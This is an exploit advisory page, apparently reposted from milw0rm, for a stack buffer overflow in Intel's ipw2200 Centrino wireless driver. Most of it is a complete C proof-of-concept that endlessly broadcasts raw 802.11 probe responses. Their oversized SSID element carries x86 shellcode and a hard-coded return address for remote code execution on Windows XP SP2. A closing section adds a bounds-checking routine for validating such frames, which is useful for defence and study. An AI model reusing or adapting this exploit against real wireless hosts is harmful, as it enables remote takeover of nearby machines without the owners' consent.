Intel Centrino ipw2200BG Wireless Driver Buffer Overflow (Exploit)

Summary

A stack-based buffer overflow has been discovered in the Intel Centrino ipw2200 integrated wireless card driver; the proof-of-concept below triggers it by transmitting crafted 802.11 probe-response frames.

Credit:

The original article can be found at:
http://www.milw0rm.com/exploits/3158


Details

Exploit:
/*
 * This is a PoC exploit for the Intel Centrino ipw2200 integrated wireless card.
 *
 * Author:
 * Giuseppe Gottardi (aka oveRet) <overet@securitydate.it>
 * Senior Security Engineer at Communication Valley S.p.A.
 *
 * This version of the code is only a proof-of-concept stack-based exploit that
 * demonstrates remote code execution on the ipw2200 driver. It executes a beep
 * user-space shellcode.
 *
 * It only works on XP SP2 ITA and was only tested with version 8.0.12.20000 of
 * the IPW2200BG driver.
 *
 * Thanks to Johnny Cache, H D Moore, skape and Barnaby Jack for their papers.
 *
 */

#include <sys/types.h>
#include <string.h>
#include <netdb.h>
#include <net/ethernet.h>
#include <netinet/if_ether.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>

//#define DEBUG
#define DEV "wlan0"
#define DELAY 0.1       /* seconds between frames */

/* Raw 802.11 probe response: 24-byte MAC header, the fixed fields (timestamp,
 * beacon interval, capability), then the information elements. The SSID
 * element declares a 0x9c-byte body, well beyond the 32-byte maximum. */
char wifi_packet[]=
"\x50"                                  // frame control: management / probe response
"\x00"
"\x3a\x01"                              // duration
"\x00\x0e\x35\x95\x7b\x45"              //DSTMAC
"\x00\x01\x02\x03\x04\x05"              // source MAC
"\x00\x01\x02\x03\x04\x05"              // BSSID
"\xc0\x31"                              // sequence control
"\x14\x3a\x25\x02\x00\x00\x00\x00"      // timestamp
"\xa0\x0f"                              // beacon interval
"\x31\x08"                              // capability info
"\x00\x9c"                              //SSID len
"\xeb\x38\xbb\x01\x03\xdf\xff\x4b\xfc\x8d\x7b\x7c\x5e\x6a\x17\x59"
"\xf3\xa5\xbf\x7c\x03\xfe\x7f\x39\x3b\x74\x09\x8b\x03\x8d\x4b\x08"
"\x89\x01\x89\x3b\x31\xc0\x64\xc6\x40\x24\x02\x8b\x1d\x1c\xf0\xdf"
"\xff\xb8\xc7\xc0\x4d\x80\x6a\x00\xff\xe0\xe8\xc3\xff\xff\xff\x60"
"\x6a\x30\x58\x99\x64\x8b\x18\x39\x53\x0c\x74\x26\x8b\x5b\x10\x8b"
"\x5b\x3c\x83\xc3\x28\x8b\x0b\x03\x4b\x03\x81\xf9\x6c\x61\x73\x73"
"\x75\x10\x64\x8b\x18\x43\x43\x43\x80\x3b\x01\x74\x05\xc6\x03\x01"
"\xeb\x07\x61\xff\x25\x08\x03\xfe\x7f\x55\x89\xe5\x83\xec\x18\xc7"
"\x45\xfc\x53\x8a\x83\x7c\xc7\x44\x24\x04\xd0\x03\x00\x00\xc7\x04"
"\x24\x01\x0e\x00\x00\x8b\x45\xfc\xff\xd0\xc9\xc3"
"\x01\x04\x82\x84\x8b\x96"              // supported rates IE
"\x03\x01\x05"                          // DS parameter set IE
"\x85\x1e\x00\x00\x86\x00\x1f\x00\xff\x03\x19\x00\x61\x70\x00\x00"
"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x06"
"\xdd\x18\x00\x50\xf2\x01\x01\x00\x00\x50\xf2\x02\x01\x00\x00\x50"
"\xf2\x02\x01\x00\x00\x50\xf2\x02\x28\x00"
"\xdd\x06\x00\x40\x96\x01\x01\x00"
"\xdd\x05\x00\x40\x96\x03\x04"
"\xdd\x16\x00\x40\x96\x04\x00\x09\x07\xa5\x00\x00\x23\xa5\x00\x00"
"\x42\x54\x00\x00\x62\x43\x00\x00"
"\xdd\x05\x00\x40\x96\x0b\x01"
"\xdd\x18\x00\x50\xf2\x02\x01\x01\x89\x00\x03\xa5\x00\x00\x27\xa5"
"\x00\x00\x42\x54\xbc\x00\x62\x43\x66\x00"
"\xdd\x10\x00\x50\xf2\x05\x00\x01\x00\x04\x00\x00\x83\x07"
"\x5a\xf0\x54\x80";                     //RET address

int send_probe_response(char *dev)
{
        struct sockaddr sa;
        int sockfd;
        int rc;

#ifdef DEBUG
        int i;
        u_char *moe = (u_char *)wifi_packet;
#endif /* DEBUG */

        memset(&sa, 0, sizeof(struct sockaddr));

        /* SOCK_PACKET addressing: sa_data carries the interface name.
         * Copy only the string, not sizeof(sa_data) bytes past a short literal. */
        sa.sa_family = PF_PACKET;
        strncpy(sa.sa_data, dev, sizeof(sa.sa_data) - 1);

#ifdef DEBUG
        for (i=0; i<sizeof(wifi_packet) -1; i++, moe++) {
                if (!(i%32)) printf("\n");
                printf("%02x ", *moe);
        }
        printf("\n");
#endif /* DEBUG */

        if ((sockfd=socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_ALL))) < 0) {
                perror("socket");
                return -1;
        }

        if((rc=sendto(sockfd, wifi_packet, sizeof(wifi_packet) -1, 0, &sa, sizeof(sa))) < 0) {
                close(sockfd);
                perror("sendto");
                return -1;
        }

        close(sockfd);
        return rc;
}

int main(int argc, char *argv[])
{
        int rc;

        (void)argc;
        (void)argv;

        printf("waiting for beep shellcode execution...\n");

        for (;;) {
                rc = send_probe_response(DEV);
                /* sleep() takes whole seconds, so sleep(0.1) would not pause at all;
                 * usleep() gives the intended fraction of a second. */
                usleep((useconds_t)(DELAY * 1000000));
        }

        return 0;
}
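The probe response above declares an SSID element of 0x9c (156) bytes, far beyond the 32-octet maximum that IEEE 802.11 permits. As an added example that is not part of the original exploit or of Intel's driver, the following bounds-checked walk over the information elements shows the validation a receiver needs before copying element bodies into fixed-size buffers; the sample inputs are constructed, with 'A's standing in for the shellcode body.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SSID_MAX_LEN 32  /* IEEE 802.11: an SSID element body is 0..32 octets */

enum ie_result { IE_OK = 0, IE_TRUNCATED = -1, IE_SSID_TOO_LONG = -2 };

/* Walk the TLV-encoded information elements ({id, len, body[len]}) that
 * follow the fixed fields of a beacon or probe response. Every element must
 * fit inside the n bytes available and the SSID element (id 0) must not
 * exceed SSID_MAX_LEN; the declared SSID length is reported via *ssid_len. */
int check_ies(const uint8_t *ies, size_t n, size_t *ssid_len)
{
    size_t off = 0;
    *ssid_len = 0;
    while (off < n) {
        if (n - off < 2)
            return IE_TRUNCATED;          /* id/len header does not fit */
        uint8_t id = ies[off], len = ies[off + 1];
        if (len > n - off - 2)
            return IE_TRUNCATED;          /* body would run past the buffer */
        if (id == 0) {
            *ssid_len = len;
            if (len > SSID_MAX_LEN)
                return IE_SSID_TOO_LONG;  /* the length an unchecked copy trusts */
        }
        off += 2 + (size_t)len;
    }
    return IE_OK;
}

/* Constructed sample: well-formed list (SSID "test", one supported rate). */
int check_sample_good(void)
{
    static const uint8_t ies[] = { 0x00, 0x04, 't', 'e', 's', 't', 0x01, 0x01, 0x82 };
    size_t ssid_len;
    return check_ies(ies, sizeof ies, &ssid_len);
}

/* Constructed sample with the SSID header of the frame above (id 0x00,
 * declared length 0x9c = 156) and a body of 'A's instead of shellcode. */
int check_sample_oversized_ssid(void)
{
    uint8_t ies[2 + 0x9c] = { 0x00, 0x9c };
    size_t ssid_len;
    memset(ies + 2, 'A', 0x9c);
    return check_ies(ies, sizeof ies, &ssid_len);
}
```

A driver or monitoring tool that rejects frames returning anything other than IE_OK never reaches the copy that the exploit relies on, and logging the reported ssid_len gives a simple detection signal for oversized SSID elements on the air.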

Categories: Exploits